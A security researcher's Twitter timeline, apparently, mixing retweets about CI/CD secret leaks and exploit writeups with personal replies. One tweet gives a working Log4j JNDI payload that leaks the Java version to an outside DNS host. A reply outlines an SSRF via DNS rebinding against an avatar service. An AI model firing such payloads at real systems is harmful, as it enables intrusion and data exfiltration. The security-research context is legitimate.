RT @Doyensec: Checkout @maxenceschmitt's presentation at @owasp's Global AppSec in Lisbon to learn how Client-Side Path Traversal can be le…

RT @Doyensec: We're excited to announce @KarimPwnz is the latest addition to the #Doyensec team! Welcome aboard!

👋 I'm graduating (Spring 2024), and I am looking for a security role in the US. My interests include web app security, CI/CD security, and open-source security. Email - karim@karimrahal.com LinkedIn - Any RT for reach would be appreciated ❤️

RT @TupleType: How a worm 🪱 can be used to compromise @github repositories at scale through the Actions dependency tree🌲? The blog details…

RT @clintgibler: 🔐 How Secrets Leak in CI/CD Pipelines This post describes a number of subtle ways secrets can leak in CI 😅 Second-order…

@ElSec_ 🔥🔥🔥🔥

@adnanthekhan Thank you so much for the kind tweet <3 Gato looks super cool and useful; I didn't know about it. Let me know if you end up adding any of the techniques. That would be awesome!

RT @alngpwn: Read my writeup and exploit for a Use-After-Free Vulnerability in Artifex MuJS (CVE-2022-44789): Hop…

@xscorp7 Thank you ❤️❤️

@Sonar_Research Yes, it's an SSRF through DNS rebinding. Exploit: /avatar/.attacker.com You point unstable-avatar-service.tld.attacker[.]com to which switches between 127.0.0.1 (private IP) and 93.184.216.34 (public IP). Then, you race condition to bypass line 14.

The "Example Usage" above allowed me to find GitHub Actions vulnerable to command injection. The scripts can also compliment the workflow suggested by @snyff:

@EdOverflow @xdavidhu @ElSec_ @rub003 @_zulln @fbsecurity W

Looking to test the Log4j RCE? Give a try. ${jndi:ldap://${sys:java:version}.target.dns-exfil-host/}

RT @rub003: Instead of relying on third parties and giving your findings/data away to them, why not use a custom DNS logger. For example dn…

@akita_zen @rub003 Fair lol. The tool is mostly meant for bypassing blocklists or exfiltrating data through DNS. But the added privacy is also useful, you know!

@rub003 Thank you for the shoutout ❤️

RT @estark37: after a bit of a blogging hiatus, here are some rambling thoughts on splitting up trust (oblivious DNS, Prio, etc.): https://…

@codingo_ @infosec_au @Bugcrowd Given that triagers have to deal with a significant number of invalid/spam reports, what steps is @Bugcrowd taking to minimize burnout amongst triagers?